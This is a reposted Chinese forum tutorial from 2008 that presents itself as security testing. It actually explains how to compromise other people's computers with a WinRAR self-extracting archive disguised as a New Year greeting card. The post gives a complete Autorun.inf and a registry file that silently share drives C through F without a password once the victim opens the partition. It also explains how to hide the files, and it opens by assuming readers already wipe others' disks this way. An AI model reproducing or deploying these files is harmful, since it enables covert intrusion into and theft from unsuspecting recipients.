找回密碼
 註冊
搜索
熱搜: 活動 交友 discuz
查看: 3700|回復: 0

[轉貼] 通過WinRAR自解壓包來實現安全檢測

[複製鏈接]
發表於 2008-2-5 14:09:02 | 顯示全部樓層 |閱讀模式
用自解壓包刪光別人的硬盤,相信大家都會。我給大家介紹個用自解壓包入侵的方法。

    如果捆綁一個木馬給別人,只要稍有常識的人有殺毒軟件就可以識破。如果不用木馬,用些批處理炸彈、碎片對像文件、或自導入註冊表文件,就可以實現各種攻擊。  

    把以下兩行保存為Autorun.inf

[Autorun]
open=regedit /s Autorun.reg

把以下一段保存為Autorun.reg

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\c$]
"Path"="c:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\E$]
"Path"="E:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\F$]
"Path"="F:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

    比如在當今電子賀卡漫天飛的時代,可以把你的自解壓包命名為「鼠年賀卡」,包裡包個真賀卡,順便把以上兩個文件打包進去,注意要指定文件解包路徑。當收賀卡人點擊自解壓包時真賀卡被解壓的同時,兩個文件就悄悄的被解到指定位置。Autorun.inf必須解到某一分區的根目錄,名字不能變,可以設置文件隱藏屬性。

    Autorun.reg文件名和釋放目錄可以任意,可以更好的隱藏,注意Autorun.inf指向目錄正確的地方。

    當受害人雙擊有Autorun.inf的分區時,他的硬盤C、D、E、F分區就被打開公享。
您需要登錄後才可以回帖 登錄 | 註冊

本版積分規則

Archiver|手機版|小黑屋|PLUS28 論壇|討論區

GMT+8, 2025-8-2 00:16 , Processed in 0.094566 second(s), 17 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回復 返回頂部 返回列表